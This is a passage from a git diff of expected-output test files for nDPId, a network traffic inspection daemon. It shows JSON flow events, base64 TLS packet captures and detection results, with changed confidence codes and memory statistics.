{"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} -01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879090 bytes -~~ total memory freed........: 5879090 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6012724 bytes +~~ total memory freed........: 6012724 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1433 chars diff --git a/test/results/tls-rdn-extract.pcap.out b/test/results/tls-rdn-extract.pcap.out index 62bd4f36e..c34661f6f 100644 --- a/test/results/tls-rdn-extract.pcap.out +++ b/test/results/tls-rdn-extract.pcap.out @@ -2,12 +2,12 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWFpbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLmNvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="} -03323{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": 